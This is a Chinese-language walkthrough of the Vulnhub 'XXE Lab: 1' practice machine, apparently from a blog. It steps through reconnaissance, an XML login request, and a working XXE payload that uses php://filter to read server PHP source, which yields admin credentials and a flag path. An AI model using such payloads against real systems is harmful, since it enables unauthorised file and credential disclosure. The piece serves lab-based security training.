Vulnhub系列靶机---XXE Lab: 1

文章目录

靶机文档:XXE Lab: 1

下载地址:Download (Mirror)

告诉了利用点:http://your-ip/xxe

信息收集

主机发现

端口扫描

目录扫描

访问robots.txt

访问/xxe

随意输入账密,登陆抓包

看到登陆的格式就是XML语言的数据格式

漏洞利用

payload:

xml 复制代码
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php">
]>
<root><name>&admin;</name><password>hj</password></root>

将选中base64格式的数据,发送到Decoder模块,去解码

刚才robots.txt文件里还显示有一个admin.php,尝试读取一下

解码发现了用户名和密码

用户名:administhebest

密码解密后是admin@123

还发现了/flagmoout.php

先用得到的账密进行登陆

也跳转到了/flagmeout.php

base64解码后得到一串base32格式的数据

复制代码
JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5

解码地址:https://www.qqxiuzi.cn/bianma/base.php

解码后得到base64格式的

再进行base64解码,得到一个路径,再次外部实体注入

运行需要php版本较低 ,高版本会报错,导致出不来结果

php5.6在线运行

相关推荐
lifejump4 小时前
文章管理系统CMS的XSS注入渗透测试(白盒)
前端·web安全·xss·安全性测试
不像程序员的程序媛13 小时前
网络安全概念之网闸&防火墙AI版
安全·web安全
Never_z&y1 天前
纵深防御——文件上传漏洞
web安全
K_i1341 天前
HTTP与HTTPS:从明文到加密的Web安全革命
web安全·http·https
huluang1 天前
网络安全等级测评师能力评估样卷及答案
安全·web安全
独行soc1 天前
2025年渗透测试面试题总结-105(题目+回答)
网络·python·安全·web安全·adb·渗透测试·安全狮
lubiii_2 天前
SQLMap常用命令指南(参数及其用法)
sql·web安全·网络安全
风语者日志3 天前
CTF攻防世界WEB精选基础入门:command_execution
web安全·网络安全·ctf·小白入门
witkey_ak98963 天前
网安面试题收集(2)
web安全
white-persist3 天前
XXE 注入漏洞全解析:从原理到实战
开发语言·前端·网络·安全·web安全·网络安全·信息可视化